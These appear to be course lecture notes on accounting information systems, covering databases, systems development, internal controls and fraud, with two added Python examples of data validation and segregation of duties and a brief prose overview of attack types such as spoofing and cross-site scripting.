
Chapter One

Accounting Information System

Data vs. Information


Data are facts stored in the system
A fact could be a number, date, name, and so on.
For example:
2/22/14
ABC Company, 123,
99, 3, 20, 60

Data vs. Information


If we put those facts within a context of a sales invoice, for example, it is meaningful and
considered information.
Invoice Date: 2/22/14 Invoice #: 123
Customer: ABC Company
Item # Qty Price
99 3 $20
Total Invoice Amount $60

• Information is valuable when the benefits exceed the costs of gathering, maintaining, and
storing the data.
Benefit (i.e., improved decision making)
Cost (i.e., time and resources used to get the information)

What Makes Information Useful?


There are seven general characteristics that make information useful:
1. Relevant: information needed to make a decision (e.g., the decision to extend customer
credit would need relevant information on customer balance from an A/R aging report)
2. Reliable: information free from bias
3. Complete: does not omit important aspects of events or activities
4. Timely: information needs to be provided in time to make the decision
5. Understandable: information must be presented in a meaningful manner
6. Verifiable: two independent people can produce the same conclusion
7. Accessible: available when needed

Transactional Information between Internal and External Parties in AIS


• Business organizations conduct business transactions between internal and external
stakeholders.
• Internal stakeholders are employees in the organization (e.g., employees and managers).
• External stakeholders are trading partners such as customers and vendors as well as other
external organizations such as banks and government.
• The AIS captures the flow of information between these users for the various business
transactions.
• Thus, an accounting information system (or simply an accounting system) may be
defined as “the combination of personnel, records, and procedures that a business uses to
meet its need for financial data”.
The AIS performs three important functions in any organization:
• It collects and stores data about activities and transactions so that the organization can
review what has happened.
• It processes data into information that is useful for making decisions that enable
management to plan, execute, and control activities.
• It provides adequate controls to safeguard the organization’s assets, including its data.
These controls ensure that the data is available when needed and that it is accurate and
reliable.

Most organizations engage in many similar and repetitive transactions. These transaction
types can be grouped into the five basic cycles, each of which constitutes a basic subsystem
in the AIS:
• The expenditure cycle consists of the activities involved in buying and paying for goods
or services used by the organization.
• The human resources/payroll cycle consists of the activities involved in hiring and paying
employees. (part of expenditure cycle)
• The revenue cycle consists of the activities involved in selling goods or services and
collecting payment for those sales.
• The financing cycle consists of those activities involved in obtaining the necessary
funds to run the organization and in repaying creditors and distributing profits to
investors.
• The production cycle consists of the activities involved in converting raw materials and
labor into finished products. (Only manufacturing companies have a production cycle;
retail
Interactions between AIS and Internal and External Parties
Organizational Decisions and Information Needed
• Business organizations use business processes to get things done.
• Business processes are a set of structured activities that are performed by people, machines,
or both to achieve a specific goal.
• Key decisions and information needed often come from these business processes.

Basic Business Processes


• External transactions fundamentally involve a “give–get” exchange.
• These basic business processes are:
▫ Revenue: give goods / give service—get cash
▫ Expenditure: get goods / get service—give cash
▫ Production: give labor and give raw materials—get finished goods
▫ Payroll: give cash—get labor
▫ Financing: give cash—get cash
What Is an Accounting Information System?
• It can be manual or computerized
• Consists of
▫ People who use the system
▫ Processes
▫ Technology (data, software, and information technology)
▫ Controls to safeguard information
• AIS – the combination of personnel, records, and procedures by which transactional data are
collected, stored, and processed into meaningful information from which business decisions
are made, and which provides adequate controls to protect and secure the organization's
data assets.

A well thought out AIS can add value through effective and efficient decisions.
▫ Having effective decisions means quality decisions
▫ Having efficient decisions means reducing costs of decision making

AIS is influenced by an organization’s strategy.


• A strategy is the overall goal the organization hopes to achieve (e.g., increase
profitability).
• Once an overall goal is determined, an organization can determine actions needed to
reach their goal and identify the informational requirements necessary to measure how
well they are doing in obtaining that goal.

AIS in the Value Chain


• The value chain shows how the different activities within an organization provide value
to the customer.
• These activities are primary and support activities.
▫ Primary activities provide direct value to the customer.
▫ Support activities enable primary activities to be efficient and effective.

Data Processing Cycle


Steps in Processing Input are:
• Capture transaction data triggered by a business activity (event).
• Make sure captured data are accurate and complete.
• Ensure company policies are followed (e.g., approval of transaction).
Information collected for an activity includes:
• Activity of interest (e.g., sale)
• Resources affected (e.g., inventory and cash)
• People who participated (e.g., customer and employee)
Information comes from source documents.
• Captures data at the source when the transaction takes place
▫ Paper source documents
▫ Source data automation (captured data from machines, e.g., Point of Sale scanners
at grocery store)
• Important to understand how data is organized
▫ Chart of accounts
• Coding schemas that are well thought out to anticipate management needs
are most efficient and effective.
▫ Transaction journals (e.g., Sales)
▫ Subsidiary ledgers (e.g., Accounts receivable)
▫ General ledger
Note: With the above, one can trace the path of the transaction (audit trail).

Data is stored in master files or transaction files.


Data Processing
Four types of processing (CRUD):
• Creating new records (e.g., adding a customer)
• Reading existing data
• Updating previous record or data
• Deleting data
Data processing can be batch processed (e.g., post records at the end of the business day) or in
real-time (process as it occurs).

Information Output
The data stored in the database files can be viewed
• Online (soft copy)
• Printed out (hard copy)
▫ Document (e.g., sales invoice)
▫ Report (e.g., monthly sales report)
▫ Query (question for specific information in a database, e.g., What division had the
most sales for the month?)
Enterprise Resource Planning (ERP) Systems
• Integrates activities from the entire organization
▫ Production
▫ Payroll
▫ Sales
▫ Purchasing
▫ Financial Reporting
Advantages of ERP System
• Integrated enterprise-wide, allowing a better flow of information: data are stored in a
centralized database and can be accessed by the various departments, which also improves
customer service.
• Data captured once (i.e., no longer need sales to enter data about a customer and then
accounting to enter same customer data for invoicing)
• Improved access control over the data through security settings
• Standardization of procedures and reports
Disadvantages of ERP System
• Costly
• Significant amount of time to implement
• Complex
• User resistance (learning new things is sometimes hard for employees)
Why Document Systems?
• Accountants must be able to read documentation and understand how a system works
(e.g., auditors need to assess risk)
• Sarbanes-Oxley Act (SOX) requires management to assess internal controls and auditors
to evaluate the assessment
• Used for systems development and changes
Data Flow Diagrams (DFD)
Focuses on the data flows for:
• Processes
• Sources and destinations of the data
• Data stores
DFDs are visually simple and can be used to represent the same process at a high (abstract) or
detailed level.
Basic Data Flow Diagram Elements

Basic Guidelines for creating a DFD


• Understand the system that you are trying to represent.
• A DFD is a simple representation meaning that you need to consider what is relevant and
what needs to be included.
• Start with a high level (context diagram) to show how data flows between outside entities
and inside the system. Use additional DFDs at the detailed level to show how data flows
within the system.
• Identify and group all the basic elements of the DFD.
• Name data elements with descriptive names, use action verbs for processes (e.g., update,
edit, prepare, validate, etc.).
• Give each process a sequential number to help the reader navigate from the abstract to the
detailed levels.
• Edit/Review/Refine your DFD to make it easy to read and understand.
Flowcharts
Describe an information system showing:
• Inputs and Outputs
• Information activities (processing data)
• Data storage
• Data flows
• Decision steps
Key strengths of flowcharts are that they can easily capture control via decision points and
show manual vs. automated processes.
Flowcharts Symbols
Types of Flowcharts
• Document: shows the flow of documents and data for a process, useful in evaluating
internal controls.
• System: depicts the data processing cycle for a process
• Program: illustrates the sequence of logic in the system process

Guidelines for Drawing Flowcharts


• Understand the system you are trying to represent.
• Identify business processes, documents, data flows, and data processing procedures.
• Organize the flowchart so that it reads from top to bottom and left to right.
• Name elements descriptively.
• Edit/Review/Refine to make it easy to read and understand.

Business Process Diagrams


• Is a visual way to represent the activities in a business process
• Intent is that all business users can easily understand the process from a standard notation
(BPMN: Business Process Modeling Notation)
• Can show the organizational unit performing the activity
Business Process Diagram Basic Symbols

Payroll Business Process Diagram Example


Chapter two
Database system
What is a database?
• Database
- a set of interrelated, centrally coordinated data files that are stored with as little data
redundancy as possible.

• A file is a related group of records.


A set of related records, such as all customer records, forms a file (e.g., the customer file).
• A record is a related group of fields
• A field is a specific attribute of interest for the entity (record)
All the fields containing data about one entity (e.g., one customer) form a record

Databases were developed to address the proliferation/increase of master files. For many years,
companies created new files and programs each time a need for information arose. Bank of
America once had 36 million customer accounts in 23 separate systems. This proliferation
created problems such as storing the same data in two or more master files.

• Database management system (DBMS)


- the program that manages and controls the data and the interfaces between the data and the
application programs that use the data stored in the database.

DBMS software links the way data are physically stored with each user’s logical view of the
data. The DBMS allows users to access, query, or update the database without reference to how
or where data are physically stored. Separating the logical and physical views of data also means
that users can change their logical view of data without changing the way data are physically
stored. Likewise, the DBA can change physical storage to improve system performance without
affecting users or application programs.

• Database system
- the database, the DBMS, and the application programs that access the database through the
DBMS.
• Database administrator
– the person responsible for coordinating, controlling, and managing the database.

• Data warehouse
In today’s fast-paced global economy, management must constantly reevaluate financial and
operating performance in light of strategic goals and quickly alter plans as needed. Since
strategic decision making requires access to large amounts of historical data, organizations are
building separate databases called data warehouses. A data warehouse is one or more very large
databases containing both detailed and summarized data for a number of years that is used for
analysis rather than transaction processing. It is not unusual for data warehouses to contain
hundreds or thousands of terabytes of data. Data warehouses do not replace transaction
processing databases; they complement them by providing support for strategic decision making.
Since data warehouses are not used for transaction processing, they are usually updated
periodically rather than in real time.

• Business intelligence
Analyzing large amounts of data for strategic decision making is often referred to as business
intelligence. There are two main techniques used in business intelligence: online analytical
processing (OLAP) and data mining. Online analytical processing (OLAP) is using queries to
investigate hypothesized relationships among data. For example, a manager may analyze
supplier purchases for the last 3 years, followed by additional queries that “drill down” to lower
levels by grouping purchases by item number and by fiscal period. Data mining is using
sophisticated statistical analysis to "discover" unhypothesized relationships in the data.

• Online analytical processing (OLAP)


- using queries to investigate hypothesized relationships among data.

• Data mining
- using sophisticated statistical analysis to “discover” unhypothesized relationships in the data.

For future class note


Proper controls are needed to reap significant benefits from data warehousing. Data validation
controls are needed to ensure that data warehouse input is accurate. Verifying the accuracy,
called scrubbing the data, is often one of the most time-consuming and expensive steps in
creating a data warehouse. It is also important to control access to the data warehouse as well as
to encrypt the stored data. Finally, it is important to regularly back up the data warehouse and
store the backups securely. Bank of America created a customer information database to provide
customer service, marketing analysis, and managerial information. It was the largest in the
banking industry, with over 600 billion characters of data. It contained all bank data on checking
and savings accounts; real estate, consumer, and commercial loans; ATMs; and bankcards.
Although the bank spends $14 million a year to maintain the data warehouse, it is worth the cost.
Queries that formerly averaged 2 hours took only 5 minutes. Minutes after Los Angeles suffered
an earthquake, the bank sorted its $28 billion mortgage loan portfolio by Zip code, identified
loans in the earthquake area, and calculated its potential loan loss.
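The data validation ("scrubbing") control described above, as an added example that is not part of the lecture notes: a small pre-load check that rejects warehouse input rows with missing keys, unparseable or future dates, non-numeric or negative amounts, and duplicate invoice numbers, and keeps a record of every rejection so the rejected rows can be traced back to their source. The record layout, field names and sample rows are constructed for illustration.

```python
"""Added example, not from the lecture notes: a minimal data-validation
("scrubbing") step in front of a data warehouse load. The record layout,
field names and sample rows are constructed for illustration."""
from datetime import date

# Fields every input record must carry (constructed layout).
REQUIRED = ("invoice_no", "invoice_date", "customer_id", "amount")


def check_record(rec):
    """Return the list of validation failures for one record (empty = clean)."""
    problems = [f"missing {f}" for f in REQUIRED if rec.get(f) in (None, "")]
    d = rec.get("invoice_date")
    if d:
        try:
            if date.fromisoformat(d) > date.today():
                problems.append("invoice_date is in the future")
        except ValueError:
            problems.append("invoice_date is not an ISO date")
    a = rec.get("amount")
    if a not in (None, ""):
        try:
            if float(a) < 0:
                problems.append("amount is negative")
        except (TypeError, ValueError):
            problems.append("amount is not numeric")
    return problems


def scrub(records):
    """Split input into (clean, rejected).

    clean    : records accepted for loading, with amount converted to float
    rejected : (record, reasons) pairs, kept as the audit record of what was
               refused and why; duplicates are detected on invoice_no."""
    clean, rejected, seen = [], [], set()
    for rec in records:
        problems = check_record(rec)
        key = rec.get("invoice_no")
        if not problems and key in seen:
            problems.append("duplicate invoice_no")
        if problems:
            rejected.append((rec, problems))
        else:
            seen.add(key)
            clean.append({**rec, "amount": float(rec["amount"])})
    return clean, rejected


# Constructed sample input (not real data).
SAMPLE = [
    {"invoice_no": 123, "invoice_date": "2014-02-22", "customer_id": "C002", "amount": "60"},
    {"invoice_no": 124, "invoice_date": "2014-02-23", "customer_id": "C001", "amount": "150.00"},
    {"invoice_no": 124, "invoice_date": "2014-02-23", "customer_id": "C001", "amount": "150.00"},
    {"invoice_no": 125, "invoice_date": "22/02/2014", "customer_id": "C001", "amount": "80"},
    {"invoice_no": 126, "invoice_date": "2014-02-25", "customer_id": "", "amount": "-5"},
]

if __name__ == "__main__":
    ok, bad = scrub(SAMPLE)
    print(f"{len(ok)} clean, {len(bad)} rejected")
    for rec, reasons in bad:
        print(rec["invoice_no"], "->", "; ".join(reasons))
```

The rejected list is as important as the clean one: a scrubbing step that silently drops rows hides the data-quality problem the control exists to surface.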
The advantages of Database systems
Virtually all mainframes and servers use database technology, and database use in personal
computers is growing rapidly. Most accountants are involved with databases through data entry,
data processing, querying, or auditing. They also develop, manage, or evaluate the controls
needed to ensure database integrity.
Databases provide organizations with the following benefits:
● Data integration. Master files are combined into large “pools” of data that many application
programs access. An example is an employee database that consolidates payroll, personnel, and
job skills master files.
● Data sharing. Integrated data are more easily shared with authorized users. Databases are
easily browsed to research a problem or obtain detailed information underlying a report. The
FBI, which does a good job of collecting data but a poor job of sharing it, is spending 8 years and
$400 million to integrate data from their different systems.
● Minimal data redundancy and data inconsistencies. Because data items are usually stored
only once, data redundancy and data inconsistencies are minimized.
● Data independence. Because data and the programs that use them are independent of each
other, each can be changed without changing the other. This facilitates programming and
simplifies data management.
● Cross-functional analysis. In a database system, relationships, such as the association
between selling costs and promotional campaigns, can be explicitly defined and used in the
preparation of management reports.
Incorrect database data can lead to bad decisions, embarrassment, and angry users.

Database Users and Designers


• Different users of the database information work at the external level of the database and have
logical views of the data. The logical view is how people conceptually organize and understand
the relationships among data items.
For example, a sales manager views all customer information as being stored in a table.
The physical view refers to the way data are physically arranged and stored in the computer
system. Database designers work with the physical, or internal, view.

• Designers of a database need to understand user’s needs and the conceptual level of the entire
database as well as the physical view. The conceptual view illustrates the different files and
relationships between the files.

• The data dictionary is a “blueprint” of the structure of the database and includes data elements,
field types, programs that use the data element, outputs, and so on.

DBMS Languages

• Data Definition Language (DDL)


▫ Builds the data dictionary
▫ Creates the database
▫ Describes logical views for each user
• Data Manipulation Language (DML)
▫ Changes the content in the database
Creation, update, insertion, and deletion of records
• Data Query Language (DQL)
▫ Enables users to retrieve/recover, order, sort and display specific data from the database.

Relational Database
Relational database – a set of tables related to one another; a database built using the relational
data model.
• Represents the conceptual and external schema as if that “data view” was truly stored in one
table.
• Although the conceptual view appears to the user that this information is in one big table, it is
really a set of tables that relate to one another.

Why Have a Set of Related Tables?

• Data stored in one large table can be redundant and inefficient causing the following problems:
▫ Update anomaly
▫ Insert anomaly
▫ Delete anomaly

• Record layout
- Document that shows the items stored in a file, including the order and length of the data fields
and the type of data stored.

• Schema
- A description of the data elements in a database, the relationships among them, and the logical
model used to organize and describe the data.

• Conceptual-level schema
- the organization-wide view of the entire database that lists all data elements and the
relationships between them.

• External-level schema
- An individual user’s view of portions of a database; also called a subschema.

• Subschema
- A subset of the schema; the way the user defines the data and the data relationships.
• Internal-level schema
- A low-level view of the entire database describing how the data are actually stored and
accessed.

Data dictionary
- information about the structure of the database, including a description of each data element.

• Report writer
- DBMS language that simplifies report creation.

Relational data model


- a two-dimensional table representation of data; each row represents a unique entity (record) and
each column is a field where record attributes are stored.
• Tuple
- a row in a table that contains data about a specific item in a database table.
• Primary key
- database attribute, or combination of attributes, that uniquely identifies each row in a table.
• Foreign key
- an attribute in a table that is also a primary key in another table; used to link the two tables.

Two Approaches to Database Design


One way to design a relational database, called normalization, begins by assuming that
everything is initially stored in one large table. Rules are then followed to decompose that initial
table into a set of tables in what is called third normal form (3NF), because they are free of
update, insert, and delete anomalies.

In an alternative design approach, called semantic data modeling, the designer uses knowledge
of business processes and information needs to create a diagram that shows what to include in
the database. This diagram is used to create a set of relational tables that are already in 3NF.

Relational Database Design Rules/ Basic Requirements


• Every column in a row must be single valued
• Primary key cannot be null (empty) also known as entity integrity
• If a foreign key is not null, it must have a value that corresponds to the value of a primary key
in another table (referential integrity)
• All other attributes in the table must describe characteristics of the object identified by the
primary key

Following these rules allows databases to be normalized and solves the update, insert, and delete
anomalies.
Entity integrity rule - a non-null primary key ensures that every row in a table represents
something and that it can be identified.
Referential integrity rule - foreign keys, which link rows in one table to rows in another table,
must have values that correspond to the value of a primary key in another table.
Queries
• Users may want specific information found in a relational database and not have to sort through
all the files to get that information. So they query (ask a question) the data.
• An example of a query might be: What are the invoices of customer D. Ainge and who was the
salesperson for those invoices?

Database Design Process

Conversion - replacing the old system with the new one. It can be one time or parallel.
Data model - an abstract representation of database contents.

Data Modeling
• Process of defining a database so that it faithfully represents all aspects of the
organization, including its interactions with the external environment.

▫ Entity-relationship (E-R) diagrams


▫ REA data model

REA Modeling

• Resources
▫ Things that have economic value to the organization (e.g., inventory, cash)
• Events
▫ Various business activities that management wants to collect information on (sale,
purchase…)
• Agents
▫ People and organizations that participate in events (both internal (e.g., employees) and
external (e.g., customers/vendors) to the organization)

Cardinality refers to the degree of relationship among events.

REA Basic Template

Creating an REA Model


• Identify relevant events
▫ Give-get exchange (economic duality)
• Identify resources and agents
▫ Resource reduced in give event
▫ Resource acquired in get event
• Determine cardinalities of relationships
▫ Nature of the relationship between the two entities
Database Systems and the Future of Accounting
Database systems have the potential to alter external reporting significantly. Considerable time
and effort are currently invested in defining how companies should summarize and re- port
accounting information to external users. In the future, companies may make a copy of the
company’s financial database available to external users in lieu of the traditional financial
statements. Users would be free to analyze the raw data however they see fit. A significant
advantage of database systems is the ability to create ad hoc queries to provide the information
needed for decision making. No longer is financial information available only in predefined
formats and at specified times. Instead, powerful and easy-to-use relational database query
languages can find and prepare the information management needs whenever they want it.
Relational DBMSs can also accommodate multiple views of the same underlying phenomenon.
For example, tables storing information about assets can include historical costs as well as
current replacement costs and market values. Thus, managers will no longer be forced to look at
data in ways predefined by accountants.
Finally, relational DBMSs are capable of integrating financial and operational data. For example,
customer satisfaction data can be stored in the database, giving managers a richer set of data for
decision making. Relational DBMSs have the potential to increase the use and value of
accounting information. Accountants must understand database systems so they can help design
and use the AISs of the future. Such participation is important for ensuring that adequate controls
are included in those systems to safeguard the data and ensure the reliability of the information
produced.
Chapter 3

Systems Development and Systems Analysis


• Systems Development Life Cycle (SDLC)

Who is involved in SDLC?


• Information Systems Steering Committee
They are system hunters in the market.
▫ Executive level, plans and oversees IS function; facilitates coordination with integration of
systems activities
• Project Development Team
▫ Plan and monitor project progress
• Systems Analysts
▫ Determine information needs, prepare specifications for programmers
• Programmers
▫ Write and test programs according to analyst’s specifications
• Management
▫ Get users involved in the process; provide support for development projects, align projects to
meet the organization's strategic needs
• Users
▫ Communicate needs to system developers, help design and test to ensure complete and accurate
processing of data

Systems Development Planning

• Proper planning provides for achieving goals and objectives


• For systems development, two plans are needed:
▫ Master Plan
Long-range and authored by steering committee outlining prioritized projects and timetables
▫ Project Development Plan
Specific to a project and authored by the project team; identifies people, hardware, software,
and financial resources needed

Business Case (Feasibility Analysis)


• Economic
▫ Do benefits of new system justify the costs (time and resources) to implement?
• Technical
▫ Can we use existing technology?
• Legal
▫ Does the new system comply with regulations, laws, and contractual obligations?
• Scheduling
▫ Can the system be developed in the time allotted?
• Operational
▫ Do we have the people to design and implement the system? Will people use the new system?

Why Do People Resist Change?


• Fear
▫ Fear of failure, the unknown, losing status
• Lack of top-management support
▫ If the top management is not supportive why should the employee change?
• Bad prior experiences
▫ Bad experience with prior IS changes
• Poor communication
▫ Employees need to understand why change is necessary
• Disruption
▫ Additional requests for information and the additional burden on time are distracting and prompt
negative feelings
• Manner change is introduced
▫ Approaches are different for top level and lower level employees
• Biases and emotions
• Personal characteristics and background
▫ Age
▫ Open to technology and comfortable with it
How to Prevent Behavioral Problems
• Management support
▫ Provide resources and motivation
• Satisfy user needs
• Involve users
▫ Participation improves communication and commitment
• Reduce fears, emphasize opportunities
• Avoid emotionalism
• Provide training
• Performance evaluation
▫ Reevaluate to ensure performance standards are consistent with the new system
• Keep open communications
• Test the system prior to implementation
• Keep system simple
▫ Avoid radical/direct changes
• Control user’s expectations
▫ Be realistic
We can reduce resistance but we cannot avoid it.

Phase 1: Systems Analysis


AIS Development Strategies
How to Obtain an AIS
• Purchase
• Develop in-house
• Outsource to outside organization
Advantage – helps to focus on your core competence
Disadvantage – may raise conflict of interest

Purchasing
• Select a vendor (from referrals, trade shows, etc.)
• Request for proposal (RFP) that meets needs
• Evaluate proposals
▫ Top vendors invited to give demonstrations on how their system will fit your needs
• Make a final selection based upon your criteria

Develop Software In-House


• Advantages
▫ Provides a significant competitive advantage
• Risks
▫ Requires significant amounts of time
▫ Complexity of the system
▫ Poor requirements defined
▫ Insufficient planning
▫ Inadequate communication and cooperation
▫ Lack of qualified staff
▫ Poor top management support

Outsourcing
Advantages
• Allows companies to concentrate on core competencies
• Asset utilization
• Access to greater expertise and better technology
• Lower costs by standardizing user applications and splitting development and maintenance
costs between projects
• Less development time
• Elimination of peaks-and-valleys usage
• Facilitates downsizing
Disadvantages
• Inflexibility
• Loss of control
• Reduced competitive advantage
• Locked-in system
• Unfulfilled goals
• Poor service
• Increased risk
System Design, Implementation, and Operation
Phase 2: Conceptual Systems Design

Phase 3: Physical Systems Design


• Output design (e.g., reports)
• File and database design
• Input design (e.g., forms, computer screen input)
• Program design
• Procedures design
• Control design
Program Design
• Determine user needs
• Create and document development plan
• Write the computer code
• Test the program
• Document the program
• Train users
• Install the system (including components and hardware)
• Use and modify the system
Phase 4: Systems Implementation
• Implementation plan
• Select and train personnel
• Complete documentation
▫ Development documentation
▫ Operations documentation
▫ User documentation
• Testing the system
• Conversion

Testing the System


• Walk-throughs
▫ Step by step review
• Processing test data
▫ Test all valid transactions and error conditions
• Acceptance tests
▫ Use copies of real data

Conversion Approaches
• Direct conversion
▫ Terminates the old and begins with the new system
• Parallel conversion
▫ Operate old and new systems for a period of time
• Phase-in conversion
▫ Gradual replacement of old elements with new system elements
• Pilot conversion
▫ Implement a system in a part of an organization (e.g., a branch)

Phase 5: Operations and Maintenance


• Conduct post-implementation review
Chapter 5
Control and Accounting Information Systems

What Is Control and Why Is It Needed?


• Any potential adverse occurrence or unwanted event that could be injurious to either the
accounting information system or the organization is referred to as a threat or risk.
• The potential dollar loss should a particular threat become a reality is referred to as the
exposure or impact of the threat.
• The probability that the threat will happen is the likelihood associated with the threat

A Primary Objective of AIS


• Is to control the organization so the organization can achieve its objectives
• Management expects accountants to:
o Take a proactive approach to eliminating system threats.
o Detect, correct, and recover from threats when they occur.

Internal Controls
• Processes implemented to provide assurance that the following objectives are achieved:
• Safeguard assets
• Maintain sufficient records
• Provide accurate and reliable information
• Prepare financial reports according to established criteria
• Promote and improve operational efficiency
• Encourage adherence with management policies
• Comply with laws and regulations

Functions of Internal Controls


• Preventive controls
▫ Deter problems from occurring
• Detective controls
▫ Discover problems that are not prevented
• Corrective controls
▫ Identify and correct problems; correct and recover from the problems

Control Frameworks

Internal Environment
• Management’s philosophy and risk appetite
Risk appetite is the amount of risk an organization is willing to accept in pursuit of its objectives.
• Commitment to integrity, ethical values, and competence
• Organizational structure
A centralized organizational structure is generally considered to provide better control because it
allows closer supervision.
• Methods of assigning authority and responsibility
• Human resource standards
Placing the appropriate person in the appropriate position.
Greater competence lowers the error rate, but it can also have a negative effect: a highly skilled
employee is better able to circumvent controls and conceal wrongdoing.

Objective Setting
• Strategic objectives
▫ High-level goals
• Operations objectives
▫ Effectiveness and efficiency of operations
• Reporting objectives
▫ Improve decision making and monitor performance
• Compliance objectives
▫ Compliance with applicable laws and regulations

Event Identification
Identifying incidents both external and internal to the organization that could affect the
achievement of the organizations objectives
Key Management Questions:
• What could go wrong?
• How can it go wrong?
• What is the potential harm?
• What can be done about it?

Risk Assessment
Risk is assessed from two perspectives:
• Likelihood - Probability that the event will occur
• Impact - Estimate potential loss if event occurs
Types of risk
• Inherent - Risk that exists before plans are made to control it
• Residual - Risk that is left over after you control it

Risk Response
• Reduce - Implement effective internal control
• Accept - Do nothing; accept likelihood and impact of risk
• Share - Buy insurance, outsource, or hedge
• Avoid - Do not engage in the activity (often not practical, since the activity may be essential to the business)

Control Activities
• Proper authorization of transactions and activities
• Segregation of duties
• Project development and acquisition controls
• Change management controls
• Design and use of documents and records
• Safeguarding assets, records, and data
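An added example (not code from these notes) of how the first two control activities above, proper authorization and segregation of duties, can be enforced in software. It models a payment-approval workflow in which the person who records a payment may not approve it, the approval limit depends on the approver's role, payments at or above a threshold need two different approvers, and the person who releases the funds (custody) must be different from both. The roles, approval limits, the 10,000 dual-control threshold and the user names are assumptions for illustration.

```python
"""Segregation of duties in a payment workflow.

Added example, not part of the original notes. Roles, approval limits,
the dual-control threshold and the user names are constructed assumptions.
"""
from dataclasses import dataclass, field
from typing import Optional

# Approval limit per role (assumed). Clerks record payments but approve none;
# treasury releases funds but approves none.
ROLE_LIMITS = {"clerk": 0, "supervisor": 5_000, "controller": 50_000, "treasury": 0}
DUAL_CONTROL_THRESHOLD = 10_000   # payments at or above this need two approvers


class SoDViolation(Exception):
    """Raised when an action would put incompatible duties in one person's hands."""


@dataclass
class Payment:
    id: str
    vendor: str
    amount: float
    created_by: str                                 # recording duty
    approvals: list = field(default_factory=list)   # authorization duty
    released_by: Optional[str] = None               # custody duty
    status: str = "draft"


def required_approvals(amount: float) -> int:
    return 2 if amount >= DUAL_CONTROL_THRESHOLD else 1


class PaymentWorkflow:
    def __init__(self, users: dict):
        self.users = users          # user name -> role
        self.audit_trail = []       # who did what, kept for independent review

    def _role(self, user: str) -> str:
        try:
            return self.users[user]
        except KeyError:
            raise SoDViolation(f"unknown user {user!r}") from None

    def approve(self, p: Payment, approver: str) -> Payment:
        role = self._role(approver)
        if approver == p.created_by:
            raise SoDViolation("the person who recorded a payment may not approve it")
        if approver in p.approvals:
            raise SoDViolation("a second approval must come from a different person")
        if ROLE_LIMITS[role] < p.amount:
            raise SoDViolation(f"{role} approval limit {ROLE_LIMITS[role]} is below {p.amount}")
        p.approvals.append(approver)
        self.audit_trail.append(("approve", p.id, approver))
        if len(p.approvals) >= required_approvals(p.amount):
            p.status = "approved"
        return p

    def release(self, p: Payment, releaser: str) -> Payment:
        self._role(releaser)
        if p.status != "approved":
            raise SoDViolation("payment has not been fully approved")
        if releaser == p.created_by or releaser in p.approvals:
            raise SoDViolation("custody of funds must be separate from recording and authorization")
        p.released_by = releaser
        p.status = "released"
        self.audit_trail.append(("release", p.id, releaser))
        return p


def run_demo() -> dict:
    """Walk one constructed payment through the workflow and record which attempts were blocked."""
    wf = PaymentWorkflow({"carol": "clerk", "sam": "supervisor",
                          "chen": "controller", "cora": "controller", "tess": "treasury"})
    p = Payment("PAY-1", "ACME Supplies", 12_000.0, created_by="carol")
    blocked = []
    for actor, action in [("carol", wf.approve), ("sam", wf.approve), ("chen", wf.approve),
                          ("chen", wf.approve), ("carol", wf.release), ("cora", wf.approve),
                          ("chen", wf.release), ("tess", wf.release)]:
        try:
            action(p, actor)
        except SoDViolation as exc:
            blocked.append((actor, action.__name__, str(exc)))
    return {"status": p.status, "approvals": p.approvals,
            "released_by": p.released_by, "blocked": blocked}
```

Five of the eight attempts in run_demo are refused: the clerk approving her own entry, a supervisor over his limit, a duplicate second approval, a release before approval is complete, and a release by one of the approvers. The audit trail is what an independent reviewer would later reconcile against the bank statement.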

Monitoring
• Perform internal control evaluations (e.g., internal audit)
• Implement effective supervision
• Use responsibility accounting systems (e.g., budgets)
• Monitor system activities
• Track purchased software and mobile devices
• Conduct periodic audits (e.g., external, internal, network security)
• Employ computer security officer
• Engage forensic specialists
• Install fraud detection software
• Implement fraud hotline
Forensic accounting identifies wrongdoing related to the organization’s accounting operations.

Threats to AIS
• Natural and Political disasters
• Software errors and equipment malfunctions
• Unintentional acts
• Intentional acts

Fraud
• Any means a person uses to gain an unfair advantage over another person; includes:
▫ A false statement, representation, or disclosure
▫ A material fact, which induces a victim to act
▫ An intent to deceive
▫ Victim relied on the misrepresentation
▫ Injury or loss was suffered by the victim

Two Categories of Fraud


• Misappropriation of assets
▫ Theft of company assets which can include physical assets (e.g., cash, inventory) and digital
assets (e.g., intellectual property such as protected trade secrets, customer data)
• Fraudulent financial reporting
▫ “cooking the books” (e.g. booking fictitious revenue, overstating assets, etc.)

Conditions for Fraud


These three conditions must be present for fraud to occur:
• Pressure
▫ Employee
Financial
Lifestyle
Emotional
▫ Financial Statement
Financial
Management
Industry conditions
• Opportunity to:
▫ Commit
▫ Conceal
▫ Convert to personal gain
• Rationalize
▫ Justify behavior
▫ Attitude that rules don’t apply
▫ Lack personal integrity

Computer Fraud
• If a computer is used to commit fraud it is called computer fraud.
• Computer fraud is classified as:
▫ Input
▫ Processor
▫ Computer instruction
▫ Data
▫ Output

Preventing and Detecting Fraud


1. Make Fraud Less Likely to Occur

Organizational
• Create a culture of integrity
• Adopt a structure that minimizes fraud
• Create good governance (e.g., Board of
• Assign authority for business objectives and hold people accountable for achieving those
objectives
• Effective supervision and monitoring of employees
• Communicate policies

Systems
▫ Develop security policies to guide and design specific control procedures
▫ Implement change management controls and project development acquisition controls

2. Make It Difficult to Commit


Organizational
• Develop strong internal controls
• Segregate accounting functions
• Use properly designed forms
• Require independent checks and reconciliations of data

Systems
• Restrict access
• System authentication
• Implement computer controls over input, processing, storage and output of data
• Use encryption
• Fix software bugs and update systems regularly
• Destroy hard drives when disposing of computers

3. Improve Detection

Organizational
• Assess fraud risk
• External and internal audits

Systems
• Install fraud detection software
• Monitor system activities (user and error logs, intrusion detection)

4. Reduce Fraud Losses

Organizational
• Insurance
Systems
• Store backup copies of program and data files in secure, off-site location

Types of Attacks
Hacking
▫ Unauthorized access, modification, or use of an electronic device or some element of a
computer system
Social Engineering
▫ Techniques or tricks on people to gain physical or logical access to confidential information
• Malware
▫ Software used to do harm

Hacking
▫ Hijacking
Gaining control of a computer to carry out illicit activities
▫ Botnet (robot network)
A network of hijacked computers (zombies) that the attacker controls remotely
▫ Denial of Service (DoS) Attack
Overwhelming a system with traffic or requests so that it cannot serve legitimate users
▫ Spoofing
Making a communication look as if someone else sent it, so as to gain confidential
information

Forms of Spoofing
• E-mail spoofing
• Caller ID spoofing
• IP address spoofing
• SMS spoofing
• Web-page spoofing (phishing)

Hacking with Computer Code


Cross-site scripting (XSS)
▫ Exploits a Web application that echoes untrusted input into its pages without proper output
encoding, so that attacker-supplied script is injected into the site. When a user visits the page,
that script runs in the user’s browser and can collect the user’s data (e.g., session cookies).
